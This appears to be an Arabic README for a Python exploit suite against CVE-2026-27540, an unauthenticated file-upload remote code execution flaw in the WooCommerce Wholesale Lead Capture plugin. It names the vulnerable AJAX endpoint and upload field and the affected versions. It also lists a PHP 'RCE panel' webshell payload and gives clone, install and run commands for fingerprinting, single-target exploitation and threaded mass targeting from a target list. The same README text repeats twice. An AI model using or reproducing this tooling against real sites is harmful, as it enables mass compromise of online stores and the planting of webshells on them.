مجموعة استغلال Python لـ CVE-2026-27540، وهو RCE عبر رفع ملفات بدون مصادقة في إضافة WooCommerce Wholesale Lead Capture، مع تحديد البصمة، والاستهداف الجماعي، وحمولة لوحة RCE.
WooCommerce Wholesale Lead Capture (WWLC) — رفع ملفات بدون مصادقة → RCE
| المنتج | WooCommerce Wholesale Lead Capture — إضافة wwlc |
| الإصدار | ≤ 2.0.3.1 |
| الإصلاح | 2.0.3.2+ — معالج الرفع محصّن |
| المصادقة | بدون مصادقة |
| المتجه | admin-ajax.php?action=wwlc_file_upload_handler |
| الحقل | file (رفع multipart) |
| مسار الكتابة | دليل uploads في WordPress |
| الحمولة | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| الملف | الوظيفة |
|---|---|
winrarzips_brand.py | شعار CMD (by winrarzips) |
wwlc_core.py | محرك الاستغلال |
CVE-2026-27540-Suite.py | واجهة سطر أوامر للدفعات + هدف واحد |
payloads/x7-panel.php | حمولة لوحة RCE |
requirements.txt | الاعتماديات |
❌ قوائم الأهداف ونتائج الفحص وعناوين URL للوحات الحية غير مضمنة في المستودع.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — رفع ملفات بدون مصادقة → RCE
| المنتج | WooCommerce Wholesale Lead Capture — إضافة wwlc |
| المتأثر | ≤ 2.0.3.1 |
| الإصلاح | 2.0.3.2+ — معالج الرفع محصّن |
| المصادقة | بدون مصادقة |
| المتجه | admin-ajax.php?action=wwlc_file_upload_handler |
| الحقل | file (رفع multipart) |
| مسار الكتابة | دليل uploads في WordPress |
| الحمولة | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| الملف | الدور |
|---|---|
winrarzips_brand.py | شعار CMD (by winrarzips) |
wwlc_core.py | نواة الاستغلال |
CVE-2026-27540-Suite.py | واجهة سطر أوامر للدفعات + هدف واحد |
payloads/x7-panel.php | حمولة لوحة RCE |
requirements.txt | الاعتماديات |
❌ قوائم الأهداف ونتائج الفحص وعناوين URL للوحات الحية غير مضمنة.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed